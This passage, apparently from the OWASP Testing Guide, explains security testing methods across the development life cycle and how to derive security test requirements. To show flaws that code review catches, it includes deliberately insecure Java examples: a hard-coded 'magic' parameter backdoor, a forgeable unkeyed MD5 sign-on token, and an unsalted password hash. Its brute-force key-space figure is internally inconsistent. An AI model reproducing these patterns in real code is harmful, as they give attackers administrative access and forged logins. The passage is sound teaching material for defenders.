Threat modeling has become a popular technique to help system designers think about the security threats that their systems and applications might face. Therefore, threat modeling can be seen as risk assessment for applications. In fact, it enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably limited resources and attention on the parts of the system that most require it. It is recommended that all applications have a threat model developed and documented. Threat models should be created as early as possible in the SDLC, and should be revisited as the application evolves and development progresses.

To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 [11] standard for risk assessment. This approach involves:
• Decomposing the application – use a process of manual inspection to understand how the application works, its assets, functionality, and connectivity.
• Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them according to business importance.
• Exploring potential vulnerabilities – whether technical, operational, or management.
• Exploring potential threats – develop a realistic view of potential attack vectors from an attacker's perspective, by using threat scenarios or attack trees.
• Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic.

The output from a threat model itself can vary but is typically a collection of lists and diagrams.
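To make the shape of that output a little more concrete, a single entry might be captured along the following lines. This is a minimal, hypothetical sketch for illustration only; the class and field names are assumptions of this example and do not come from NIST 800-30 or any OWASP template.

    // Hypothetical sketch only: one way to record a single threat-model entry,
    // mirroring the steps above (asset, threat, vulnerability, mitigation).
    public class ThreatModelEntry {
        String asset;             // e.g., a tangible asset such as stored customer data
        int businessImportance;   // ranking used to prioritize limited resources (1 = highest)
        String threatScenario;    // attacker's-view description of a potential attack vector
        String vulnerability;     // technical, operational, or management weakness that enables it
        String mitigation;        // control proposed for threats deemed realistic

        public static void main(String[] args) {
            ThreatModelEntry entry = new ThreatModelEntry();
            entry.asset = "customer account data";
            entry.businessImportance = 1;
            entry.threatScenario = "attacker extracts account data through an injection flaw in the search feature";
            entry.vulnerability = "user input concatenated into database queries without validation";
            entry.mitigation = "parameterized queries plus server-side input validation";
            System.out.println(entry.asset + ": " + entry.threatScenario
                    + " -> mitigate with " + entry.mitigation);
        }
    }

Collected across all identified threats, entries like this form the lists that feed the classification, prioritization, and mitigation steps described above.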
The OWASP Code Review Guide outlines an Application Threat Modeling methodology that can be used as a reference for testing applications for potential security flaws in their design. There is no right or wrong way to develop threat models and perform information risk assessments on applications [12].

Advantages:
• Practical attacker's view of the system
• Flexible
• Early in the SDLC

Disadvantages:
• Relatively new technique
• Good threat models don't automatically mean good software

Source Code Review

Overview
Source code review is the process of manually checking the source code of a web application for security issues. Many serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying goes, "if you want to know what's really going on, go straight to the source." Almost all security experts agree that there is no substitute for actually looking at the code. All the information for identifying security problems is there in the code somewhere. Unlike testing third-party closed software such as operating systems, when testing web applications (especially if they have been developed in-house) the source code should be made available for testing purposes.

Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis or testing, such as penetration testing, making source code analysis the technique of choice for technical testing. With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and remove the guess work of black box testing. Examples of issues that are particularly conducive to being found through source code reviews include concurrency problems, flawed business logic, access control problems, and cryptographic weaknesses, as well as backdoors, Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient at finding implementation issues such as places where input validation was not performed or where fail-open control procedures may be present. But keep in mind that operational procedures need to be reviewed as well, since the source code being deployed might not be the same as the one being analyzed [13].

Advantages:
• Completeness and effectiveness
• Accuracy
• Fast (for competent reviewers)

Disadvantages:
• Requires highly skilled security developers
• Can miss issues in compiled libraries
• Cannot detect run-time errors easily
• The source code actually deployed might differ from the one being analyzed

For more on code review, check out the OWASP Code Review project.

Penetration Testing

Overview
Penetration testing has been a common technique used to test network security for many years. It is also commonly known as black box testing or ethical hacking. Penetration testing is essentially the "art" of testing a running application remotely to find security vulnerabilities, without knowing the inner workings of the application itself. Typically, the penetration test team would have access to an application as if they were users. The tester acts like an attacker and attempts to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system.
While penetration testing has proven to be effective in network security, the technique does not naturally translate to applications. When penetration testing is performed on networks and operating systems, the majority of the work is involved in finding and then exploiting known vulnerabilities in specific technologies. As web applications are almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Penetration testing tools have been developed that automate the process, but with the nature of web applications their effectiveness is usually poor.

Many people today use web application penetration testing as their primary security testing technique. Whilst it certainly has its place in a testing program, we do not believe it should be considered as the primary or only testing technique. Gary McGraw in [14] summed up penetration testing well when he said, "If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don't have a very bad problem." However, focused penetration testing (i.e., testing that attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific vulnerabilities are actually fixed in the source code deployed on the web site.

Advantages:
• Can be fast (and therefore cheap)
• Requires a relatively lower skill-set than source code review
• Tests the code that is actually being exposed

Disadvantages:
• Too late in the SDLC
• Front impact testing only

The Need for a Balanced Approach

With so many techniques and approaches to testing the security of web applications, it can be difficult to understand which techniques to use and when to use them. Experience shows that there is no right or wrong answer to the question of exactly what techniques should be used to build a testing framework. In fact, all techniques should probably be used to test all the areas that need to be tested.

Although it is clear that there is no single technique that can be performed to effectively cover all security testing and ensure that all issues have been addressed, many companies adopt only one approach. The approach used has historically been penetration testing. Penetration testing, while useful, cannot effectively address many of the issues that need to be tested. It is simply "too little too late" in the software development life cycle (SDLC). The correct approach is a balanced approach that includes several techniques, from manual reviews to technical testing. A balanced approach should cover testing in all phases of the SDLC. This approach leverages the most appropriate techniques available depending on the current SDLC phase.

Of course there are times and circumstances where only one technique is possible. Consider, for example, a test on a web application that has already been created, but where the testing party does not have access to the source code. In this case, penetration testing is clearly better than no testing at all. However, the testing parties should be encouraged to challenge assumptions, such as no access to source code, and to explore the possibility of more complete testing. A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate culture. It is recommended that a balanced testing framework should look something like the representations shown in Figure 3 and Figure 4.
The following figure shows a typical proportional representation overlaid onto the software development life cycle. In keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of development.

Figure 3: Proportion of Test Effort in SDLC (define, design, develop, deploy, maintain)

The following figure shows a typical proportional representation overlaid onto testing techniques.

Figure 4: Proportion of Test Effort According to Test Technique (process reviews & manual inspections, code review, security testing)

A Note about Web Application Scanners

Many organizations have started to use automated web application scanners. While they undoubtedly have a place in a testing program, some fundamental issues need to be highlighted about why it is believed that automating black box testing is not (or will ever be) effective. However, highlighting these issues should not discourage the use of web application scanners. Rather, the aim is to ensure the limitations are understood and testing frameworks are planned appropriately. Important: OWASP is currently working to develop a web application scanner benchmarking platform. The following examples show why automated black box testing is not effective.

Example 1: Magic Parameters

Imagine a simple web application that accepts a name-value pair of "magic" and then the value. For simplicity, the GET request may be:

    http://www.host/application?magic=value

To further simplify the example, the values in this case can only be ASCII characters a-z (upper or lowercase) and integers 0-9. The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will then be logged in and presented with an administrative screen with total control of the application. The HTTP request is now:

    http://www.host/application?magic=sf8g7sfjdsurtsdieerwqredsgnfg8d

Given that all of the other parameters were simple two- and three-character fields, it is not possible to start guessing combinations at approximately 28 characters. A web application scanner will need to brute force (or guess) the entire key space of 30 characters. That is up to 30^28 permutations, or trillions of HTTP requests. That is an electron in a digital haystack. The code for this exemplar magic parameter check may look like the following:

    public void doPost(HttpServletRequest request, HttpServletResponse response) {
        String magic = "sf8g7sfjdsurtsdieerwqredsgnfg8d";
        boolean admin = magic.equals(request.getParameter("magic"));
        if (admin) doAdmin(request, response);
        else { ... }  // normal processing
    }

By looking in the code, the vulnerability practically leaps off the page as a potential problem.

Example 2: Bad Cryptography

Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is logged into site A, then he/she will generate a key using an MD5 hash function that comprises: Hash { username : date }

When a user is passed to site B, he/she will send the key on the query string to site B in an HTTP redirect. Site B independently computes the hash, and compares it to the hash passed on the request. If they match, site B signs the user in as the user they claim to be.
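The scheme above is easy to render in code, which makes its weakness obvious. The following is a minimal, hypothetical sketch written for this discussion (the class and method names, and the assumed date format, are illustrative and do not come from the guide): because the token is an unkeyed MD5 hash of values an attacker can know or guess, anyone who learns the scheme can mint a valid token for any username.

    import java.security.MessageDigest;
    import java.text.SimpleDateFormat;
    import java.util.Date;

    // Hypothetical illustration of the weak single sign-on scheme described above.
    // Site A builds the token; site B recomputes it and compares. Nothing in the
    // token is secret, so anyone who knows the scheme can forge it.
    public class WeakSsoToken {

        // Hash { username : date } using MD5 -- no secret key, no salt.
        static String tokenFor(String username, Date date) throws Exception {
            String day = new SimpleDateFormat("yyyy-MM-dd").format(date);
            MessageDigest md5 = MessageDigest.getInstance("MD5");
            byte[] digest = md5.digest((username + ":" + day).getBytes("UTF-8"));
            StringBuilder hex = new StringBuilder();
            for (byte b : digest) {
                hex.append(String.format("%02x", b));
            }
            return hex.toString();
        }

        public static void main(String[] args) throws Exception {
            // Site B would accept this value as proof that "admin" arrived from site A,
            // yet an attacker who knows the scheme can compute exactly the same token.
            System.out.println("Forged token for admin: " + tokenFor("admin", new Date()));
        }
    }

A manual reviewer spots the missing secret immediately; a black-box scanner, as discussed next, only sees an opaque 128-bit value that changes with each user.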
If they match, site B signs the user in as the user they claim to be. As the scheme is explained the inadequacies can be worked out. Anyone that figures out the scheme (or is told how it works, or downloads the information from Bugtraq) can log in as any user. Manual inspection, such as a review or code inspection, would have uncovered this security issue quickly. A black-box web application scanner would not have uncovered the vulnerability. It would have seen a 128-bit hash that changed with each user, and by the nature of hash functions, did not change in any predictable way. 16 Testing Guide Introduction A Note about Static Source Code Review Tools Many organizations have started to use static source code scanners. While they undoubtedly have a place in a comprehensive testing program, it is necessary to highlight some fundamental issues about why this approach is not effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design, since it cannot understand the context in which the code is constructed. Source code analysis tools are useful in determining security issues due to coding errors, however significant manual effort is required to validate the findings. Deriving Security Test Requirements To have a successful testing program, one must know what the testing objectives are. These objectives are specified by the security requirements. This section discusses in detail how to document requirements for security testing by deriving them from applicable standards and regulations, and from positive and negative application requirements. It also discusses how security requirements effectively drive security testing during the SDLC and how security test data can be used to effectively manage software security risks. Testing Objectives One of the objectives of security testing is to validate that security controls operate as expected. This is documented via security requirements that describe the functionality of the security control. At a high level, this means proving confidentiality, integrity, and availability of the data as well as the service. The other objective is to validate that security controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the OWASP Top Ten, as well as vulnerabilities that have been previously identified with security assessments during the SDLC, such as threat modelling, source code analysis, and penetration test. Security Requirements Documentation The first step in the documentation of security requirements is to understand the business requirements. A business requirement document can provide initial high-level information on the expected functionality of the application. For example, the main purpose of an application may be to provide financial services to customers or to allow goods to be purchased from an on-line catalog. A security section of the business requirements should highlight the need to protect the customer data as well as to comply with applicable security documentation such as regulations, standards, and policies. A general checklist of the applicable regulations, standards, and policies is a good preliminary security compliance analysis for web applications. For example, compliance regulations can be identified by checking information about the business sector and the country or state where the application will operate. Some of these compliance guidelines and regulations might translate into specific technical requirements for security controls. 
For example, in the case of financial applications, the compliance with FFIEC guidelines for authentication [15] requires that financial institutions implement applications that mitigate weak authentication risks with multi-layered security control and multi-factor authentication. Applicable industry standards for security need also to be captured by the general security requirement checklist. For example, in the case of applications that handle customer credit card data, the compliance with the PCI DSS [16] standard forbids the storage of PINs and CVV2 data and requires that the merchant protect magnetic strip data in storage and transmission with encryption and on display by masking. Such PCI DSS security requirements could be validated via source code analysis. Another section of the checklist needs to enforce general requirements for compliance with the organization’s information security standards and policies. From the functional requirements perspective, requirements for the security control need to map to a specific section of the information security standards. An example of such requirement can be: “a password complexity of six alphanumeric characters must be enforced by the authentication controls used by the application.” When security requirements map to compliance rules a security test can validate the exposure of compliance risks. If violation with information security standards and policies are found, these will result in a risk that can be documented and that the business has to manage. Since these security compliance requirements are enforceable, they need to be well documented and validated with security tests. Security Requirements Validation From the functionality perspective, the validation of security requirements is the main objective of security testing. From the risk management perspective, the validation of security requirements is the objective of information security assessments. At a high level, the main goal of information security assessments is the identification of gaps in security controls, such as lack of basic authentication, authorization, or encryption controls. More in depth, the security assessment objective is risk analysis, such as the identification of potential weaknesses in security controls that ensure the confidentiality, integrity, and availability of the data. For example, when the application deals with personal identifiable information (PII) and sensitive data, the security requirement to be validated is the compliance with the company information security policy requiring encryption of such data in transit and in storage. Assuming encryption is used to protect the data, encryption algorithms and key lengths need to comply with the organization encryption standards. These might require that only certain algorithms and key lengths could be used. For example, a security requirement that can be security tested is verifying that only allowed ciphers are used (e.g., SHA-256, RSA, AES) with allowed minimum key lengths (e.g., more than 128 bit for symmetric and more than 1024 for asymmetric encryption). From the security assessment perspective, security requirements can be validated at different phases of the SDLC by using different artifacts and testing methodologies. 
For example, threat modeling focuses on identifying security flaws during design, secure code analysis and reviews focus on identifying security issues in source code during development, and penetration testing focuses on identifying vulnerabilities in the application during testing or validation.
Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later with security tests. By combining the results of different testing techniques, it is possible to derive better security test cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities from the un-exploitable ones is possible when the results of penetration tests and source code analysis are combined.
Considering the security test for a SQL injection vulnerability, for example, a black box test might first involve a scan of the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be validated is the generation of a SQL exception. A further validation of the SQL vulnerability might involve manually injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve a lot of trial-and-error analysis until the malicious query is executed. Assuming the tester has the source code, she might learn from the source code analysis how to construct the SQL attack vector that can exploit the vulnerability (e.g., execute a malicious query returning confidential data to an unauthorized user).

Threats and Countermeasures Taxonomies
A threat and countermeasure classification, which takes into consideration root causes of vulnerabilities, is the critical factor in verifying that security controls are designed, coded, and built to mitigate the impact of the exposure of such vulnerabilities. In the case of web applications, the exposure of security controls to common vulnerabilities, such as the OWASP Top Ten, can be a good starting point to derive general security requirements. More specifically, the web application security frame [17] provides a classification (i.e., a taxonomy) of vulnerabilities that can be documented in different guidelines and standards and validated with security tests.
The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and the root cause of the vulnerability. A threat can be categorized by using STRIDE [18] as Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as a security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause of a weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary between the client and server tiers of the application. A security requirement that captures the threat of non-repudiation during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g., mutual authentication) that can be validated later on with security tests.
A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for secure coding such as secure coding standards. An example of a common coding error in authentication controls consists of applying a hash function to a password without applying a seed (salt) to the value, as illustrated in the sketch below.
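The following minimal Java sketch (not taken from the guide; class and method names are illustrative only) contrasts the unsalted-digest coding error described above with a salted alternative, to show what a secure code review would look for.

import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;

public class PasswordHashingExample {

    // Vulnerable pattern: an unsalted digest of the password alone. Identical passwords
    // always produce identical hashes, so stored values can be attacked with
    // precomputed dictionaries (rainbow tables).
    static byte[] unsaltedHash(String password) throws NoSuchAlgorithmException {
        MessageDigest md = MessageDigest.getInstance("MD5");
        return md.digest(password.getBytes(StandardCharsets.UTF_8));
    }

    // Safer pattern for illustration: a per-user random salt mixed into the digest.
    // A real implementation would prefer a dedicated password-hashing scheme
    // (e.g., bcrypt or PBKDF2) rather than a plain digest.
    static byte[] saltedHash(String password, byte[] salt) throws NoSuchAlgorithmException {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        md.update(salt);
        return md.digest(password.getBytes(StandardCharsets.UTF_8));
    }

    static byte[] newSalt() {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;
    }
}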
From the secure coding perspective, this is a vulnerability that affects the encryption used for authentication with a vulnerability root cause in a coding error. Since the root cause is insecure coding the security requirement can be documented in secure coding standards and validated through secure code reviews during the development phase of the SDLC. Security Testing and Risk Analysis Security requirements need to take into consideration the severity of the vulnerabilities to support a risk mitigation strategy. Assuming that the organization maintains a repository of vulnerabilities found in applications (i.e, a vulnerability knowledge base), the security issues can be reported by type, issue, mitigation, root cause, and mapped to the applications where they are found. Such a vulnerability knowledge base can also be used to establish a metrics to analyze the effectiveness of the security tests throughout the SDLC. For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis and reported with a coding error root cause and input validation vulnerabil- ity type. The exposure of such vulnerability can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might validate that special characters are filtered before hitting the database and mitigate the vulnerability. By combining the results of source code analysis and penetration testing it is possible to determine the likelihood and exposure of the vulnerability and calculate the risk rating of the vulnerability. By reporting vulnerability risk ratings in the findings (e.g., test report) it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be prioritized for remediation, while low risk can be fixed in further releases. By considering the threat scenarios of exploiting common vulnerabilities it is possible to identify potential risks that the application security control needs to be security tested for. For example, the OWASP Top Ten vulnerabilities can be mapped to attacks such as phishing, privacy violations, identify theft, system compromise, data alteration or data destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack scenarios. Ideally, the organization vulnerability knowledge base can be used to derive security risk driven tests cases to validate the most likely attack scenarios. For example, if identity theft is considered high risk, negative test scenarios should validate the mitigation of impacts deriving from the exploit of vulnerabilities in authentication, cryptographic controls, input validation, and authorization controls. Deriving Functional and Non Functional Test Requirements Functional Security Requirements From the perspective of functional security requirements, the applicable standards, policies and regulations drive both the need for a type of security control as well as the control functionality. These requirements are also referred to as “positive requirements”, since they state the expected functionality that can be validated through security tests. Examples of positive requirements are: “the application will lockout the user after six failed log on attempts” or “passwords need to be a minimum of six alphanumeric characters”. 
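As a rough illustration of how such a positive requirement can be turned into an automated pass/fail check, the sketch below uses a hypothetical PasswordPolicy class and JUnit 4 style tests; neither is prescribed by the guide, and the implementation is included only to keep the example self-contained.

import static org.junit.Assert.*;
import org.junit.Test;

public class PasswordPolicyTest {

    // Positive requirement: "passwords need to be a minimum of six alphanumeric characters".
    @Test
    public void acceptsSixAlphanumericCharacters() {
        assertTrue(PasswordPolicy.isValid("abc123"));
    }

    @Test
    public void rejectsShortOrNonAlphanumericPasswords() {
        assertFalse(PasswordPolicy.isValid("ab12"));    // too short
        assertFalse(PasswordPolicy.isValid("abc 12"));  // contains a space
    }
}

// Hypothetical implementation of the rule, shown only to make the example runnable.
class PasswordPolicy {
    static boolean isValid(String password) {
        return password != null && password.matches("[A-Za-z0-9]{6,}");
    }
}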
The validation of positive requirements consists of asserting the expected functionality and can be tested by re-creating the testing conditions and running the test according to predefined inputs. The results are then shown as a fail or pass condition.
In order to validate security requirements with security tests, security requirements need to be function driven and they need to highlight the expected functionality (the what) and implicitly the implementation (the how). Examples of high-level security design requirements for authentication can be:
• Protect user credentials and shared secrets in transit and in storage
• Mask any confidential data in display (e.g., passwords, accounts)
• Lock the user account after a certain number of failed log in attempts
• Do not show specific validation errors to the user as a result of a failed log on
• Only allow passwords that are alphanumeric, include special characters and six characters minimum length, to limit the attack surface
• Allow for password change functionality only to authenticated users by validating the old password, the new password, and the user answer to the challenge question, to prevent brute forcing of a password via password change
• The password reset form should validate the user's username and the user's registered email before sending the temporary password to the user via email. The temporary password issued should be a one time password. A link to the password reset web page will be sent to the user. The password reset web page should validate the user temporary password, the new password, as well as the user answer to the challenge question.

Risk Driven Security Requirements
Security tests need also to be risk driven, that is, they need to validate the application for unexpected behavior. These are also called "negative requirements", since they specify what the application should not do. Examples of negative requirements are:
• The application should not allow for the data to be altered or destroyed
• The application should not be compromised or misused for unauthorized financial transactions by a malicious user
Negative requirements are more difficult to test, because there is no expected behavior to look for. This might require a threat analyst to come up with unforeseeable input conditions, causes, and effects. This is where security testing needs to be driven by risk analysis and threat modeling. The key is to document the threat scenarios and the functionality of the countermeasure as a factor to mitigate a threat.
For example, in the case of authentication controls, the following security requirements can be documented from the threats and countermeasure perspective:
• Encrypt authentication data in storage and transit to mitigate risk of information disclosure and authentication protocol attacks
• Encrypt passwords using non reversible encryption such as using a digest (e.g., HASH) and a seed to prevent dictionary attacks
• Lock out accounts after reaching a log on failure threshold and enforce password complexity to mitigate risk of brute force password attacks
• Display generic error messages upon validation of credentials to mitigate risk of account harvesting or enumeration
• Mutually authenticate client and server to prevent non-repudiation and Man In the Middle (MiTM) attacks
Threat modeling tools such as threat trees and attack libraries can be useful to derive the negative test scenarios.
A threat tree will assume a root attack (e.g., attacker might be able to read other users’ messages) and identify different exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and necessary countermeasures (e.g., implement data validation and parametrized queries) that could be validated to be effective in mitigating such attacks. Deriving Security Test Requirements Through Use and Misuse Cases A prerequisite to describing the application functionality is to un- derstand what the application is supposed to do and how. This can be done by describing use cases. Use cases, in the graphical form as commonly used in software engineering, show the interactions of actors and their relations. They help to identify the actors in the application, their relationships, the intended sequence of actions for each scenario, alternative actions, special requirements, preconditions and and post-conditions. Similar to use cases, misuse and abuse cases [19] describe unintended and malicious use scenarios of the application. These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application. By going through the individual steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well-defined can be discovered. The key is to describe all possible or, at least, the most critical use and misuse scenarios. Misuse scenarios allow the analysis of the application from the attacker’s point of view and contribute to identifying potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to determine which of them are the most critical ones and need to be documented in security requirements. The identification of the most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls where security risks should be mitigated. To derive security requirements from use and misuse case [20] it is important to define the functional scenarios and the negative scenarios and put these in graphical form. In the case of derivation of security requirements for authentication, for example, the following step-by-step methodology can be followed. Step 1: Describe the Functional Scenario: User authenticates by supplying a username and password. The application grants access to users based upon authentication of user credentials by the application and provides specific errors to the user when validation fails. Step 2: Describe the Negative Scenario: Attacker breaks the authentication through a brute force or dictionary attack of passwords and account harvesting vulnerabilities in the application. The validation errors provide specific information to an attacker to guess which accounts are actually valid registered accounts (usernames). Then the attacker will try to brute force the password for such a valid account. A brute force attack to four minimum length all digit passwords can succeed with a limited number of attempts (i.e., 10^4). Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case: The graphical example in Figure below depicts the derivation of security requirements via use and misuse cases. 
The functional scenario consists of the user actions (entering a username and password) and the application actions (authenticating the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e., trying to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from error messages. By graphically representing the threats to the user actions (misuses), it is possible to derive the countermeasures as the application actions that mitigate such threats.

[Figure: Use and misuse case diagram for authentication. USER: enter username and password. APPLICATION/SERVER: user authentication, show generic error message, lock account after N failed login attempts, validate password minimum length and complexity. HACKER/MALICIOUS USER: brute force authentication, harvest (guess) valid user accounts, dictionary attacks.]

Step 4: Elicit The Security Requirements. In this case, the following security requirements for authentication are derived:
1) Passwords need to be alphanumeric, lower and upper case and a minimum of seven characters in length
2) Accounts need to lock out after five unsuccessful log in attempts
3) Log in error messages need to be generic
These security requirements need to be documented and tested.

Security Tests Integrated in Development and Testing Workflows
Security Testing in the Development Workflow
Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure that the individual software components they have developed are security tested before they are integrated with other components and built into the application. Software components might consist of software artifacts such as functions, methods, and classes, as well as application programming interfaces, libraries, and executable files.
For security testing, developers can rely on the results of the source code analysis to verify statically that the developed source code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests can further verify dynamically (i.e., at run time) that the components function as expected. Before integrating both new and existing code changes in the application build, the results of the static and dynamic analysis should be reviewed and validated.
The validation of source code before integration in application builds is usually the responsibility of the senior developer. Such senior developers are also the subject matter experts in software security and their role is to lead the secure code review. They must make decisions on whether to accept the code to be released in the application build or to require further changes and testing. This secure code review workflow can be enforced via formal acceptance as well as a check in a workflow management tool. For example, assuming the typical defect management workflow used for functional bugs, security bugs that have been fixed by a developer can be reported on a defect or change management system. The build master can look at the test results reported by the developers in the tool and grant approvals for checking in the code changes into the application build.

Security Testing in the Test Workflow
After components and code changes are tested by developers and checked in to the application build, the most likely next step in the software development process workflow is to perform tests on the application as a whole entity.
This level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing activities they can be used to validate both the security functionality of the application as a whole, as well as the exposure to application level vulnerabilities. These security tests on the application include both white box testing, such as source code analysis, and black box testing, such as penetration testing. Gray box testing is similar to black box testing. In gray box testing it is assumed that the tester has some partial knowledge about the session management of the application, and that should help in understanding whether the log out and timeout functions are properly secured.
The target for the security tests is the complete system that will be potentially attacked and includes both the whole source code and the executable. One peculiarity of security testing during this phase is that it is possible for security testers to determine whether vulnerabilities can be exploited and expose the application to real risks. These include common web application vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as threat modeling, source code analysis, and secure code reviews.
Usually testing engineers, rather than software developers, perform security tests when the application is in scope for integration system tests. Such testing engineers have security knowledge of web application vulnerabilities, black box and white box security testing techniques, and own the validation of security requirements in this phase. In order to perform such security tests, it is a prerequisite that security test cases are documented in the security testing guidelines and procedures.
A testing engineer who validates the security of the application in the integrated system environment might release the application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e., validation), the application functional testing is usually a responsibility of QA testers, while white-hat hackers or security consultants are usually responsible for security testing. Some organizations rely on their own specialized ethical hacking team to conduct such tests when a third party assessment is not required (such as for auditing purposes). Since these tests are the last resort for fixing vulnerabilities before the application is released to production, it is important that such issues are addressed as recommended by the testing team. The recommendations can include code, design, or configuration change. At this level, security auditors and information security officers discuss the reported security issues and analyze the potential risks according to information risk management procedures. Such procedures might require the development team to fix all high risk vulnerabilities before the application can be deployed, unless such risks are acknowledged and accepted.

Developers' Security Tests
Security Testing in the Coding Phase: Unit Tests
From the developer's perspective, the main objective of security tests is to validate that code is being developed in compliance with secure coding standards requirements. Developers' own coding artifacts (such as functions, methods, classes, APIs, and libraries) need to be functionally validated before being integrated into the application build.
The security requirements that developers have to follow should be documented in secure coding standards and validated with static and dynamic analysis. If the unit test activity follows a secure code review, unit tests can validate that code changes required by secure code reviews are properly implemented.
Secure code reviews and source code analysis through source code analysis tools help developers in identifying security issues in source code as it is developed. By using unit tests and dynamic analysis (e.g., debugging) developers can validate the security functionality of components as well as verify that the countermeasures being developed mitigate any security risks previously identified through threat modeling and source code analysis.
In the case of security functional tests, unit level tests can test the functionality of security controls at the software component level, such as functions, methods, or classes. For example, a test case could validate input and output validation (e.g., variable sanitization) and boundary checks for variables by asserting the expected functionality of the component.
The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software components. In the case of authentication components, for example, security unit tests can assert the functionality of setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account lockout (e.g., by setting the account lockout counter to a negative number).
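As a rough illustration of this kind of unit-level security test, the JUnit 4 style sketch below asserts the lockout threshold and rejects a negative counter value. The AuthenticationService class here is a test-local stand-in written only to make the example self-contained; it is not a component defined by the guide.

import static org.junit.Assert.*;
import java.util.HashMap;
import java.util.Map;
import org.junit.Before;
import org.junit.Test;

public class AccountLockoutTest {

    // Minimal stand-in for the authentication component under test; in a real project
    // this would be the production class, not a test-local sketch.
    static class AuthenticationService {
        private static final int LOCKOUT_THRESHOLD = 5;
        private final Map<String, String> passwords = new HashMap<>();
        private final Map<String, Integer> failedAttempts = new HashMap<>();

        void register(String user, String password) {
            passwords.put(user, password);
            failedAttempts.put(user, 0);
        }

        boolean login(String user, String password) {
            if (isLocked(user)) return false;
            if (password.equals(passwords.get(user))) return true;
            failedAttempts.merge(user, 1, Integer::sum);
            return false;
        }

        boolean isLocked(String user) {
            return failedAttempts.getOrDefault(user, 0) >= LOCKOUT_THRESHOLD;
        }

        void setFailedAttemptCounter(String user, int value) {
            if (value < 0) throw new IllegalArgumentException("counter must not be negative");
            failedAttempts.put(user, value);
        }
    }

    private AuthenticationService auth;

    @Before
    public void setUp() {
        auth = new AuthenticationService();
        auth.register("alice", "Str0ngPassw0rd!");
    }

    // Positive assertion: the account locks after five failed log in attempts.
    @Test
    public void accountLocksAfterFiveFailedAttempts() {
        for (int i = 0; i < 5; i++) {
            auth.login("alice", "wrong-password");
        }
        assertTrue(auth.isLocked("alice"));
    }

    // Negative assertion: the lockout counter rejects out-of-range (negative) values,
    // so user-controlled input cannot be abused to reset or bypass the lockout.
    @Test(expected = IllegalArgumentException.class)
    public void lockoutCounterRejectsNegativeValues() {
        auth.setFailedAttemptCounter("alice", -1);
    }
}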
At the component level, security unit tests can validate positive assertions as well as negative assertions, such as errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as potential denial of service caused by resources not being de-allocated (e.g., connection handles not closed within a finally block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential information disclosure via informative error messages and stack traces.
Unit level security test cases can be developed by a security engineer who is the subject matter expert in software security and is also responsible for validating that the security issues in the source code have been fixed and can be checked into the integrated system build. Typically, the manager of the application builds also makes sure that third-party libraries and executable files are security assessed for potential vulnerabilities before being integrated in the application build.
A good practice for developers is to build security test cases as a generic security test suite that is part of the existing unit testing framework. A generic security test suite could be derived from previously defined use and misuse cases to security test functions, methods and classes. A generic security test suite might include security test cases to validate both positive and negative requirements for security controls such as:
• Identity, Authentication & Access Control
• Input Validation & Encoding
• Encryption
• User and Session Management
• Error and Exception Handling
• Auditing and Logging
